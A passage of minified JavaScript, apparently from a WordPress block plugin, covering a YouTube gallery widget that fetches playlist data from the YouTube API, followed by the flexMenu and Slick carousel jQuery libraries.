class="ultp-ytg-description">${i(l,n)}</div>`),r+="</div>",r}t(".wp-block-ultimate-post-youtube-gallery").each((function(){const r=t(this),d=r.find(".ultp-block-wrapper");let c=r.find(".ultp-ytg-view-grid, .ultp-ytg-container");const p=r.find(".ultp-ytg-loadmore-btn"),u={playlistIdOrUrl:r.data("playlist")||"",apiKey:r.data("api-key")||"",cacheDuration:parseInt(r.data("cache-duration"))||0,sortBy:r.data("sort-by")||"date",galleryLayout:r.data("gallery-layout")||"grid",videosPerPage:e(r.data("videos-per-page"),{lg:9,md:6,sm:3}),showVideoTitle:"1"==r.data("show-video-title"),videoTitleLength:e(r.data("video-title-length"),{lg:50,md:50,sm:50}),loadMoreEnable:"1"==r.data("load-more-enable"),moreButtonLabel:r.data("more-button-label")||"More Videos",autoplay:"1"==r.data("autoplay"),loop:"1"==r.data("loop"),mute:"1"==r.data("mute"),showPlayerControl:"1"==r.data("show-player-control"),hideYoutubeLogo:"1"==r.data("hide-youtube-logo"),showDescription:"1"==r.data("show-description"),videoDescriptionLength:e(r.data("video-description-length"),{lg:100,md:100,sm:100}),imageHeightRatio:r.data("image-height-ratio")||"16-9",galleryColumn:e(r.data("gallery-column"),{lg:3,md:2,sm:1}),displayType:r.data("display-type")||"grid",enableListView:"1"==r.data("enable-list-view"),enableIconAnimation:"1"==r.data("enable-icon-animation"),defaultYoutubeIcon:"1"==r.data("enable-youtube-icon"),imgHeight:r.data("img-height")};let h=o(u.playlistIdOrUrl);if(h.startsWith("@")){l(h.substring(1),u.apiKey,(function(t){t?(h=t,f(h)):d.html('<p style="color:#888">Invalid handle or API key.</p>')}))}else f(h);function f(e){if(e.startsWith("UC")&&(e="UU"+e.substring(2)),!e||!u.apiKey)return void d.html('<p style="color:#888">Please provide both YouTube playlist ID/URL and API key.</p>');let o=[],l=u.videosPerPage.lg||9,h=null,f=null;function m(){const e=t(window).width();l=e<600?Math.max(l,u.videosPerPage.sm||3):e<900?Math.max(l,u.videosPerPage.md||6):Math.max(l,u.videosPerPage.lg||9)}function g(t){if(!t.length)return void c.html("<p>No videos found in this playlist.</p>");h||(h=t[0]);let e='<div class="ultp-ytg-main">';const s=`\n\t\t\t\t\t\t<div class="ultp-ytg-video-wrapper">\n\t\t\t\t\t\t\t<iframe \n\t\t\t\t\t\t\t\tsrc="https://www.youtube.com/embed/${h.videoId}?${["autoplay="+(u.autoplay?"1":"0"),"loop="+(u.loop?"1":"0"),"mute="+(u.mute?"1":"0"),"controls="+(u.showPlayerControl?"1":"0"),"modestbranding="+(u.hideYoutubeLogo?"1":"0"),u.loop?`playlist=${h.videoId}`:null].filter(Boolean).join("&")}"\n\t\t\t\t\t\t\t\ttitle="YouTube Video"\n\t\t\t\t\t\t\t\tframeborder="0"\n\t\t\t\t\t\t\t\tallow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"\n\t\t\t\t\t\t\t\tallowfullscreen\n\t\t\t\t\t\t\t></iframe>\n\t\t\t\t\t\t\t${a(u.showVideoTitle,h.title,u.videoTitleLength,u.showDescription,h.description,u.videoDescriptionLength,h.videoId)}\n\t\t\t\t\t\t</div>\n\t\t\t\t\t`;e+=s,e+="</div>",e+='<div class="ultp-ytg-playlist-sidebar">',e+='<div class="ultp-ytg-playlist-items">',t.forEach((function(t){const s=t.videoId===h.videoId;e+=`\n\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item ${s?"active":""}" data-video-id="${t.videoId}">\n\t\t\t\t\t\t\t\t<img src="${t.thumbnail}" alt="${t.title}" loading="lazy" />\n\t\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item-content">\n\t\t\t\t\t\t\t\t\t<div class="ultp-ytg-playlist-item-title">\n\t\t\t\t\t\t\t\t\t\t${i(t.title,u.videoTitleLength)}\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t`})),e+="</div></div>",c.html(e)}function v(e,i){if(!e.length)return void c.html("<p>No videos found in this playlist.</p>");const s=e.slice(0,i);let o="";s.forEach((function(e){const i=f===e.videoId;if(o+=`<div class="ultp-ytg-item${i?" active":""}">`,o+='<div class="ultp-ytg-video">',i)o+=n(e.videoId,u);else{const i=t(".ultp-ytg-play__icon").html();o+=`\n\t\t\t\t\t\t\t\t<img src="${e.thumbnail}" alt="${e.title}" loading="lazy" data-video-id="${e.videoId}" style="cursor:pointer;" />\n\t\t\t\t\t\t\t\t<div class="ultp-ytg-play__icon${u.enableIconAnimation?" ytg-icon-animation":""}">\n\t\t\t\t\t\t\t\t\t${i}\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t`}o+="</div>",o+='<div class="ultp-ytg-inside">',o+=a(u.showVideoTitle,e.title,u.videoTitleLength,u.showDescription,e.description,u.videoDescriptionLength,e.videoId),o+="</div></div>"})),c.html(o),u.loadMoreEnable&&i<e.length?p.show():p.hide()}function b(t,e){"playlist"===u.galleryLayout?g(t):v(t,e)}const w=`ultp_youtube_gallery_${e}_${u.apiKey}_${u.sortBy}_${u.imgHeight}`,y=u.cacheDuration;let k=null;try{k=JSON.parse(localStorage.getItem(w))}catch(t){k=null}const x=Date.now();k&&k.data&&k.timestamp&&y>0&&x-k.timestamp<1e3*y?(o=s(k.data,u.sortBy),b(o,l)):("playlist"!==u.galleryLayout?c.html('\n\t\t\t\t\t\t\t<div class="ultp-ytg-loading gallery-postx gallery-active">\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t\t<div class="skeleton-box"></div>\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t'):c.html('\n\t\t\t\t\t\t\t<div class="ultp-ytg-loading ultp-ytg-playlist-loading">\n\t\t\t\t\t\t\t\t<div class="ytg-loader"></div>\n\t\t\t\t\t\t\t</div>'),t.get("https://www.googleapis.com/youtube/v3/playlistItems",{part:"snippet",maxResults:50,playlistId:e,key:u.apiKey}).done((function(e){setTimeout((function(){if(c.empty(),e.error)return void c.html(`<div class="ultp-ytg-error">${e.error.message||"Failed to fetch playlist."}</div>`);const i=(e.items||[]).filter((function(t){return"Private video"!==t.snippet.title&&"Deleted video"!==t.snippet.title})).map((function(t){return{videoId:t.snippet.resourceId.videoId,title:t.snippet.title,thumbnail:t.snippet.thumbnails&&t.snippet.thumbnails[u.imgHeight]&&t.snippet.thumbnails[u.imgHeight].url||t.snippet.thumbnails[u.imgHeight].url||t.snippet.thumbnails?.medium?.url||"",publishedAt:t.snippet.publishedAt||"",description:t.snippet.description||"",viewCount:0}}));if("popular"===u.sortBy){const e=i.map((t=>t.videoId)).join(",");t.get(`https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${e}&key=${u.apiKey}`).done((function(t){if(t.items){const e={};t.items.forEach((function(t){e[t.id]=t.statistics.viewCount})),i.forEach((function(t){t.viewCount=parseInt(e[t.videoId]||0)}))}if(o=s(i,u.sortBy),y>0)try{localStorage.setItem(w,JSON.stringify({data:i,timestamp:x}))}catch(t){console.warn("Failed to cache videos:",t)}b(o,l)})).fail((function(){console.warn("Failed to fetch video statistics for popular sorting."),o=s(i,u.sortBy),b(o,l)}))}else{if(o=s(i,u.sortBy),y>0)try{localStorage.setItem(w,JSON.stringify({data:i,timestamp:x}))}catch(t){console.warn("Failed to cache videos:",t)}b(o,l)}}),2e3)})).fail((function(){setTimeout((function(){c.empty(),c.html('<div class="ultp-ytg-error">Failed to fetch videos. Please try again.</div>')}),3e3)}))),r.on("click",".ultp-ytg-playlist-item",(function(){const e=t(this).data("video-id");e&&(h=o.find((function(t){return t.videoId===e})),h&&g(o))})),r.on("click",".ultp-ytg-play__icon",(function(){const e=t(this).siblings("img[data-video-id]").data("video-id");if(!e)return;const i=t(this).closest(".ultp-ytg-item");i.find(".ultp-ytg-video").html('<div class="ultp-ytg-loading"><div class="ytg-loader"></div></div>'),i.addClass("active").siblings(".ultp-ytg-item").removeClass("active"),setTimeout((function(){f=e,v(o,l)}),1e3)})),r.on("click",".ultp-ytg-video img[data-video-id]",(function(){const e=t(this).data("video-id");e&&(f=e,v(o,l))})),p.on("click",(function(){l+=u.videosPerPage.lg,v(o,l)})),t(window).on("resize",(function(){o.length&&(m(),b(o,l))}))}}))}()}))}(jQuery),function(t){"function"==typeof define&&define.amd?define(["jquery"],t):t(jQuery)}((function(t){var e,i=t(window).width(),s=t(window).height(),o=[];t(window).on("resize",(function(){clearTimeout(e),e=setTimeout((function(){t(window).width()===i&&t(window).height()===s||(t(o).each((function(){t(this).flexMenu({undo:!0}).flexMenu(this.options)})),i=t(window).width(),s=t(window).height())}),200)})),t.fn.flexMenu=function(e){var i,s=t.extend({threshold:2,cutoff:2,linkText:"More",linkTitle:"View More",linkTextAll:"Menu",linkTitleAll:"Open/Close Menu",shouldApply:function(){return!0},showOnHover:!0,popupAbsolute:!0,popupClass:"",undo:!1},e);return this.options=s,(i=t.inArray(this,o))>=0?o.splice(i,1):o.push(this),this.each((function(){var e,i,o,l,n,a,r=t(this),d=r.find("> li"),c=d.first(),p=d.last(),u=d.length,h=Math.floor(c.offset().top),f=Math.floor(c.outerHeight(!0)),m=!1;function g(t){return Math.ceil(t.offset().top)>=h+f}if(g(p)&&u>s.threshold&&!s.undo&&r.is(":visible")&&s.shouldApply()){var v=t('<ul class="flexMenu-popup" style="display:none;'+(s.popupAbsolute?" position: absolute;":"")+'"></ul>');for(v.addClass(s.popupClass),a=u;a>1;a--){if(i=g(e=r.find("> li:last-child")),a-1<=s.cutoff){t(r.children().get().reverse()).appendTo(v),m=!0;break}if(!i)break;e.appendTo(v)}m?r.append('<li class="flexMenu-viewMore flexMenu-allInPopup"><a href="#" title="'+s.linkTitleAll+'">'+s.linkTextAll+"</a></li>"):r.append('<li class="flexMenu-viewMore"><a href="#" title="'+s.linkTitle+'">'+s.linkText+"</a></li>"),g(o=r.find("> li.flexMenu-viewMore"))&&r.find("> li:nth-last-child(2)").appendTo(v),v.children().each((function(t,e){v.prepend(e)})),o.append(v),r.find("> li.flexMenu-viewMore > a").on("click",(function(e){var i;i=o,t("li.flexMenu-viewMore.active").not(i).removeClass("active").find("> ul").hide(),v.toggle(),o.toggleClass("active"),e.preventDefault()})),s.showOnHover&&"undefined"!=typeof Modernizr&&!Modernizr.touch&&o.hover((function(){v.show(),t(this).addClass("active")}),(function(){v.hide(),t(this).removeClass("active")}))}else if(s.undo&&r.find("ul.flexMenu-popup")){for(l=(n=r.find("ul.flexMenu-popup")).find("li").length,a=1;a<=l;a++)n.find("> li:first-child").appendTo(r);n.remove(),r.find("> li.flexMenu-viewMore").remove()}}))}})),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof exports?module.exports=t(require("jquery")):t(jQuery)}((function(t){"use strict";var e,i=window.Slick||{};e=0,(i=function(i,s){var o,l=this;l.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:t(i),appendDots:t(i),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,i){return t('<button type="button" />').text(i+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0,useTransform:!0,variableWidth:!1,vertical:!1,verticalSwiping:!1,waitForAnimate:!0,zIndex:1e3},l.initials={animating:!1,dragging:!1,autoPlayTimer:null,currentDirection:0,currentLeft:null,currentSlide:0,direction:1,$dots:null,listWidth:null,listHeight:null,loadIndex:0,$nextArrow:null,$prevArrow:null,scrolling:!1,slideCount:null,slideWidth:null,$slideTrack:null,$slides:null,sliding:!1,slideOffset:0,swipeLeft:null,swiping:!1,$list:null,touchObject:{},transformsEnabled:!1,unslicked:!1},t.extend(l,l.initials),l.activeBreakpoint=null,l.animType=null,l.animProp=null,l.breakpoints=[],l.breakpointSettings=[],l.cssTransitions=!1,l.focussed=!1,l.interrupted=!1,l.hidden="hidden",l.paused=!0,l.positionProp=null,l.respondTo=null,l.rowCount=1,l.shouldClick=!0,l.$slider=t(i),l.$slidesCache=null,l.transformType=null,l.transitionType=null,l.visibilityChange="visibilitychange",l.windowWidth=0,l.windowTimer=null,o=t(i).data("slick")||{},l.options=t.extend({},l.defaults,s,o),l.currentSlide=l.options.initialSlide,l.originalSettings=l.options,void 0!==document.mozHidden?(l.hidden="mozHidden",l.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(l.hidden="webkitHidden",l.visibilityChange="webkitvisibilitychange"),l.autoPlay=t.proxy(l.autoPlay,l),l.autoPlayClear=t.proxy(l.autoPlayClear,l),l.autoPlayIterator=t.proxy(l.autoPlayIterator,l),l.changeSlide=t.proxy(l.changeSlide,l),l.clickHandler=t.proxy(l.clickHandler,l),l.selectHandler=t.proxy(l.selectHandler,l),l.setPosition=t.proxy(l.setPosition,l),l.swipeHandler=t.proxy(l.swipeHandler,l),l.dragHandler=t.proxy(l.dragHandler,l),l.keyHandler=t.proxy(l.keyHandler,l),l.instanceUid=e++,l.htmlExpr=/^(?:\s*(<[\w\W]+>)[^>]*)$/,l.registerBreakpoints(),l.init(!0)}).prototype.activateADA=function(){this.$slideTrack.find(".slick-active").attr({"aria-hidden":"false"}).find("a, input, button, select").attr({tabindex:"0"})},i.prototype.addSlide=i.prototype.slickAdd=function(e,i,s){var o=this;if("boolean"==typeof i)s=i,i=null;else if(i<0||i>=o.slideCount)return!1;o.unload(),"number"==typeof i?0===i&&0===o.$slides.length?t(e).appendTo(o.$slideTrack):s?t(e).insertBefore(o.$slides.eq(i)):t(e).insertAfter(o.$slides.eq(i)):!0===s?t(e).prependTo(o.$slideTrack):t(e).appendTo(o.$slideTrack),o.$slides=o.$slideTrack.children(this.options.slide),o.$slideTrack.children(this.options.slide).detach(),o.$slideTrack.append(o.$slides),o.$slides.each((function(e,i){t(i).attr("data-slick-index",e)})),o.$slidesCache=o.$slides,o.reinit()},i.prototype.animateHeight=function(){var t=this;if(1===t.options.slidesToShow&&!0===t.options.adaptiveHeight&&!1===t.options.vertical){var e=t.$slides.eq(t.currentSlide).outerHeight(!0);t.$list.animate({height:e},t.options.speed)}},i.prototype.animateSlide=function(e,i){var s={},o=this;o.animateHeight(),!0===o.options.rtl&&!1===o.options.vertical&&(e=-e),!1===o.transformsEnabled?!1===o.options.vertical?o.$slideTrack.animate({left:e},o.options.speed,o.options.easing,i):o.$slideTrack.animate({top:e},o.options.speed,o.options.easing,i):!1===o.cssTransitions?(!0===o.options.rtl&&(o.currentLeft=-o.currentLeft),t({animStart:o.currentLeft}).animate({animStart:e},{duration:o.options.speed,easing:o.options.easing,step:function(t){t=Math.ceil(t),!1===o.options.vertical?(s[o.animType]="translate("+t+"px, 0px)",o.$slideTrack.css(s)):(s[o.animType]="translate(0px,"+t+"px)",o.$slideTrack.css(s))},complete:function(){i&&i.call()}})):(o.applyTransition(),e=Math.ceil(e),!1===o.options.vertical?s[o.animType]="translate3d("+e+"px, 0px, 0px)":s[o.animType]="translate3d(0px,"+e+"px, 0px)",o.$slideTrack.css(s),i&&setTimeout((function(){o.disableTransition(),i.call()}),o.options.speed))},i.prototype.getNavTarget=function(){var e=this.options.asNavFor;return e&&null!==e&&(e=t(e).not(this.$slider)),e},i.prototype.asNavFor=function(e){var i=this.getNavTarget();null!==i&&"object"==typeof i&&i.each((function(){var i=t(this).slick("getSlick");i.unslicked||i.slideHandler(e,!0)}))},i.prototype.applyTransition=function(t){var e=this,i={};!1===e.options.fade?i[e.transitionType]=e.transformType+" "+e.options.speed+"ms "+e.options.cssEase:i[e.transitionType]="opacity "+e.options.speed+"ms "+e.options.cssEase,!1===e.options.fade?e.$slideTrack.css(i):e.$slides.eq(t).css(i)},i.prototype.autoPlay=function(){var t=this;t.autoPlayClear(),t.slideCount>t.options.slidesToShow&&(t.autoPlayTimer=setInterval(t.autoPlayIterator,t.options.autoplaySpeed))},i.prototype.autoPlayClear=function(){this.autoPlayTimer&&clearInterval(this.autoPlayTimer)},i.prototype.autoPlayIterator=function(){var t=this,e=t.currentSlide+t.options.slidesToScroll;t.paused||t.interrupted||t.focussed||(!1===t.options.infinite&&(1===t.direction&&t.currentSlide+1===t.slideCount-1?t.direction=0:0===t.direction&&(e=t.currentSlide-t.options.slidesToScroll,t.currentSlide-1==0&&(t.direction=1))),t.slideHandler(e))},i.prototype.buildArrows=function(){var e=this;!0===e.options.arrows&&(e.$prevArrow=t(e.options.prevArrow).addClass("slick-arrow"),e.$nextArrow=t(e.options.nextArrow).addClass("slick-arrow"),e.slideCount>e.options.slidesToShow?(e.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.prependTo(e.options.appendArrows),e.htmlExpr.test(e.options.nextArrow)&&e.$nextArrow.appendTo(e.options.appendArrows),!0!==e.options.infinite&&e.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true")):e.$prevArrow.add(e.$nextArrow).addClass("slick-hidden").attr({"aria-disabled":"true",tabindex:"-1"}))},i.prototype.buildDots=function(){var e,i,s=this;if(!0===s.options.dots&&s.slideCount>s.options.slidesToShow){for(s.$slider.addClass("slick-dotted"),i=t("<ul />").addClass(s.options.dotsClass),e=0;e<=s.getDotCount();e+=1)i.append(t("<li />").append(s.options.customPaging.call(this,s,e)));s.$dots=i.appendTo(s.options.appendDots),s.$dots.find("li").first().addClass("slick-active")}},i.prototype.buildOut=function(){var e=this;e.$slides=e.$slider.children(e.options.slide+":not(.slick-cloned)").addClass("slick-slide"),e.slideCount=e.$slides.length,e.$slides.each((function(e,i){t(i).attr("data-slick-index",e).data("originalStyling",t(i).attr("style")||"")})),e.$slider.addClass("slick-slider"),e.$slideTrack=0===e.slideCount?t('<div class="slick-track"/>').appendTo(e.$slider):e.$slides.wrapAll('<div class="slick-track"/>').parent(),e.$list=e.$slideTrack.wrap('<div class="slick-list"/>').parent(),e.$slideTrack.css("opacity",0),!0!==e.options.centerMode&&!0!==e.options.swipeToSlide||(e.options.slidesToScroll=1),t("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"),e.setupInfinite(),e.buildArrows(),e.buildDots(),e.updateDots(),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),!0===e.options.draggable&&e.$list.addClass("draggable")},i.prototype.buildRows=function(){var t,e,i,s,o,l,n,a=this;if(s=document.createDocumentFragment(),l=a.$slider.children(),a.options.rows>0){for(n=a.options.slidesPerRow*a.options.rows,o=Math.ceil(l.length/n),t=0;t<o;t++){var r=document.createElement("div");for(e=0;e<a.options.rows;e++){var d=document.createElement("div");for(i=0;i<a.options.slidesPerRow;i++){var c=t*n+(e*a.options.slidesPerRow+i);l.get(c)&&d.appendChild(l.get(c))}r.appendChild(d)}s.appendChild(r)}a.$slider.empty().append(s),a.$slider.children().children().children().css({width:100/a.options.slidesPerRow+"%",display:"inline-block"})}},i.prototype.checkResponsive=function(e,i){var s,o,l,n=this,a=!1,r=n.$slider.width(),d=window.innerWidth||t(window).width();if("window"===n.respondTo?l=d:"slider"===n.respondTo?l=r:"min"===n.respondTo&&(l=Math.min(d,r)),n.options.responsive&&n.options.responsive.length&&null!==n.options.responsive){for(s in o=null,n.breakpoints)n.breakpoints.hasOwnProperty(s)&&(!1===n.originalSettings.mobileFirst?l<n.breakpoints[s]&&(o=n.breakpoints[s]):l>n.breakpoints[s]&&(o=n.breakpoints[s]));null!==o?null!==n.activeBreakpoint?(o!==n.activeBreakpoint||i)&&(n.activeBreakpoint=o,"unslick"===n.breakpointSettings[o]?n.unslick(o):(n.options=t.extend({},n.originalSettings,n.breakpointSettings[o]),!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e)),a=o):(n.activeBreakpoint=o,"unslick"===n.breakpointSettings[o]?n.unslick(o):(n.options=t.extend({},n.originalSettings,n.breakpointSettings[o]),!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e)),a=o):null!==n.activeBreakpoint&&(n.activeBreakpoint=null,n.options=n.originalSettings,!0===e&&(n.currentSlide=n.options.initialSlide),n.refresh(e),a=o),e||!1===a||n.$slider.trigger("breakpoint",[n,a])}},i.prototype.changeSlide=function(e,i){var s,o,l=this,n=t(e.currentTarget);switch(n.is("a")&&e.preventDefault(),n.is("li")||(n=n.closest("li")),s=l.slideCount%l.options.slidesToScroll!=0?0:(l.slideCount-l.currentSlide)%l.options.slidesToScroll,e.data.message){case"previous":o=0===s?l.options.slidesToScroll:l.options.slidesToShow-s,l.slideCount>l.options.slidesToShow&&l.slideHandler(l.currentSlide-o,!1,i);break;case"next":o=0===s?l.options.slidesToScroll:s,l.slideCount>l.options.slidesToShow&&l.slideHandler(l.currentSlide+o,!1,i);break;case"index":var a=0===e.data.index?0:e.data.index||n.index()*l.options.slidesToScroll;l.slideHandler(l.checkNavigable(a),!1,i),n.children().trigger("focus");break;default:return}},i.prototype.checkNavigable=function(t){var e,i;if(i=0,t>(e=this.getNavigableIndexes())[e.length-1])t=e[e.length-1];else for(var s in e){if(t<e[s]){t=i;break}i=e[s]}return t},i.prototype.cleanUpEvents=function(){var e=this;e.options.dots&&null!==e.$dots&&(t("li",e.$dots).off("click.slick",e.changeSlide).off("mouseenter.slick",t.proxy(e.interrupt,e,!0)).off("mouseleave.slick",t.proxy(e.interrupt,e,!1)),!0===e.options.accessibility&&e.$dots.off("keydown.slick",e.keyHandler)),e.$slider.off("focus.slick blur.slick"),!0===e.options.arrows&&e.slideCount>e.options.slidesToShow&&(e.$prevArrow&&e.$prevArrow.off("click.slick",e.changeSlide),e.$nextArrow&&e.$nextArrow.off("click.slick",e.changeSlide),!0===e.options.accessibility&&(e.$prevArrow&&e.$prevArrow.off("keydown.slick",e.keyHandler),e.$nextArrow&&e.$nextArrow.off("keydown.slick",e.keyHandler))),e.$list.off("touchstart.slick mousedown.slick",e.swipeHandler),e.$list.off("touchmove.slick mousemove.slick",e.swipeHandler),e.$list.off("touchend.slick mouseup.slick",e.swipeHandler),e.$list.off("touchcancel.slick mouseleave.slick",e.swipeHandler),e.$list.off("click.slick",e.clickHandler),t(document).off(e.visibilityChange,e.visibility),e.cleanUpSlideEvents(),!0===e.options.accessibility&&e.$list.off("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().off("click.slick",e.selectHandler),t(window).off("orientationchange.slick.slick-"+e.instanceUid,e.orientationChange),t(window).off("resize.slick.slick-"+e.instanceUid,e.resize),t("[draggable!=true]",e.$slideTrack).off("dragstart",e.preventDefault),t(window).off("load.slick.slick-"+e.instanceUid,e.setPosition)},i.prototype.cleanUpSlideEvents=function(){var e=this;e.$list.off("mouseenter.slick",t.proxy(e.interrupt,e,!0)),e.$list.off("mouseleave.slick",t.proxy(e.interrupt,e,!1))},i.prototype.cleanUpRows=function(){var t,e=this;e.options.rows>0&&((t=e.$slides.children().children()).removeAttr("style"),e.$slider.empty().append(t))},i.prototype.clickHandler=function(t){!1===this.shouldClick&&(t.stopImmediatePropagation(),t.stopPropagation(),t.preventDefault())},i.prototype.destroy=function(e){var i=this;i.autoPlayClear(),i.touchObject={},i.cleanUpEvents(),t(".slick-cloned",i.$slider).detach(),i.$dots&&i.$dots.remove(),i.$prevArrow&&i.$prevArrow.length&&(i.$prevArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.prevArrow)&&i.$prevArrow.remove()),i.$nextArrow&&i.$nextArrow.length&&(i.$nextArrow.removeClass("slick-disabled slick-arrow slick-hidden").removeAttr("aria-hidden aria-disabled tabindex").css("display",""),i.htmlExpr.test(i.options.nextArrow)&&i.$nextArrow.remove()),i.$slides&&(i.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each((function(){t(this).attr("style",t(this).data("originalStyling"))})),i.$slideTrack.children(this.options.slide).detach(),i.$slideTrack.detach(),i.$list.detach(),i.$slider.append(i.$slides)),i.cleanUpRows(),i.$slider.removeClass("slick-slider"),i.$slider.removeClass("slick-initialized"),i.$slider.removeClass("slick-dotted"),i.unslicked=!0,e||i.$slider.trigger("destroy",[i])},i.prototype.disableTransition=function(t){var e=this,i={};i[e.transitionType]="",!1===e.options.fade?e.$slideTrack.css(i):e.$slides.eq(t).css(i)},i.prototype.fadeSlide=function(t,e){var i=this;!1===i.cssTransitions?(i.$slides.eq(t).css({zIndex:i.options.zIndex}),i.$slides.eq(t).animate({opacity:1},i.options.speed,i.options.easing,e)):(i.applyTransition(t),i.$slides.eq(t).css({opacity:1,zIndex:i.options.zIndex}),e&&setTimeout((function(){i.disableTransition(t),e.call()}),i.options.speed))},i.prototype.fadeSlideOut=function(t){var e=this;!1===e.cssTransitions?e.$slides.eq(t).animate({opacity:0,zIndex:e.options.zIndex-2},e.options.speed,e.options.easing):(e.applyTransition(t),e.$slides.eq(t).css({opacity:0,zIndex:e.options.zIndex-2}))},i.prototype.filterSlides=i.prototype.slickFilter=function(t){var e=this;null!==t&&(e.$slidesCache=e.$slides,e.unload(),e.$slideTrack.children(this.options.slide).detach(),e.$slidesCache.filter(t).appendTo(e.$slideTrack),e.reinit())},i.prototype.focusHandler=function(){var e=this;e.$slider.off("focus.slick blur.slick").on("focus.slick","*",(function(i){var s=t(this);setTimeout((function(){e.options.pauseOnFocus&&s.is(":focus")&&(e.focussed=!0,e.autoPlay())}),0)})).on("blur.slick","*",(function(i){t(this);e.options.pauseOnFocus&&(e.focussed=!1,e.autoPlay())}))},i.prototype.getCurrent=i.prototype.slickCurrentSlide=function(){return this.currentSlide},i.prototype.getDotCount=function(){var t=this,e=0,i=0,s=0;if(!0===t.options.infinite)if(t.slideCount<=t.options.slidesToShow)++s;else for(;e<t.slideCount;)++s,e=i+t.options.slidesToScroll,i+=t.options.slidesToScroll<=t.options.slidesToShow?t.options.slidesToScroll:t.options.slidesToShow;else if(!0===t.options.centerMode)s=t.slideCount;else if(t.options.asNavFor)for(;e<t.slideCount;)++s,e=i+t.options.slidesToScroll,i+=t.options.slidesToScroll<=t.options.slidesToShow?t.options.slidesToScroll:t.options.slidesToShow;else s=1+Math.ceil((t.slideCount-t.options.slidesToShow)/t.options.slidesToScroll);return s-1},i.prototype.getLeft=function(t){var e,i,s,o,l=this,n=0;return l.slideOffset=0,i=l.$slides.first().outerHeight(!0),!0===l.options.infinite?(l.slideCount>l.options.slidesToShow&&(l.slideOffset=l.slideWidth*l.options.slidesToShow*-1,o=-1,!0===l.options.vertical&&!0===l.options.centerMode&&(2===l.options.slidesToShow?o=-1.5:1===l.options.slidesToShow&&(o=-2)),n=i*l.options.slidesToShow*o),l.slideCount%l.options.slidesToScroll!=0&&t+l.options.slidesToScroll>l.slideCount&&l.slideCount>l.options.slidesToShow&&(t>l.slideCount?(l.slideOffset=(l.options.slidesToShow-(t-l.slideCount))*l.slideWidth*-1,n=(l.options.slidesToShow-(t-l.slideCount))*i*-1):(l.slideOffset=l.slideCount%l.options.slidesToScroll*l.slideWidth*-1,n=l.slideCount%l.options.slidesToScroll*i*-1))):t+l.options.slidesToShow>l.slideCount&&(l.slideOffset=(t+l.options.slidesToShow-l.slideCount)*l.slideWidth,n=(t+l.options.slidesToShow-l.slideCount)*i),l.slideCount<=l.options.slidesToShow&&(l.slideOffset=0,n=0),!0===l.options.centerMode&&l.slideCount<=l.options.slidesToShow?l.slideOffset=l.slideWidth*Math.floor(l.options.slidesToShow)/2-l.slideWidth*l.slideCount/2:!0===l.options.centerMode&&!0===l.options.infinite?l.slideOffset+=l.slideWidth*Math.floor(l.options.slidesToShow/2)-l.slideWidth:!0===l.options.centerMode&&(l.slideOffset=0,l.slideOffset+=l.slideWidth*Math.floor(l.options.slidesToShow/2)),e=!1===l.options.vertical?t*l.slideWidth*-1+l.slideOffset:t*i*-1+n,!0===l.options.variableWidth&&(s=l.slideCount<=l.options.slidesToShow||!1===l.options.infinite?l.$slideTrack.children(".slick-slide").eq(t):l.$slideTrack.children(".slick-slide").eq(t+l.options.slidesToShow),e=!0===l.options.rtl?s[0]?-1*(l.$slideTrack.width()-s[0].offsetLeft-s.width()):0:s[0]?-1*s[0].offsetLeft:0,!0===l.options.centerMode&&(s=l.slideCount<=l.options.slidesToShow||!1===l.options.infinite?l.$slideTrack.children(".slick-slide").eq(t):l.$slideTrack.children(".slick-slide").eq(t+l.options.slidesToShow+1),e=!0===l.options.rtl?s[0]?-1*(l.$slideTrack.width()-s[0].offsetLeft-s.width()):0:s[0]?-1*s[0].offsetLeft:0,e+=(l.$list.width()-s.outerWidth())/2)),e},i.prototype.getOption=i.prototype.slickGetOption=function(t){return this.options[t]},i.prototype.getNavigableIndexes=function(){var 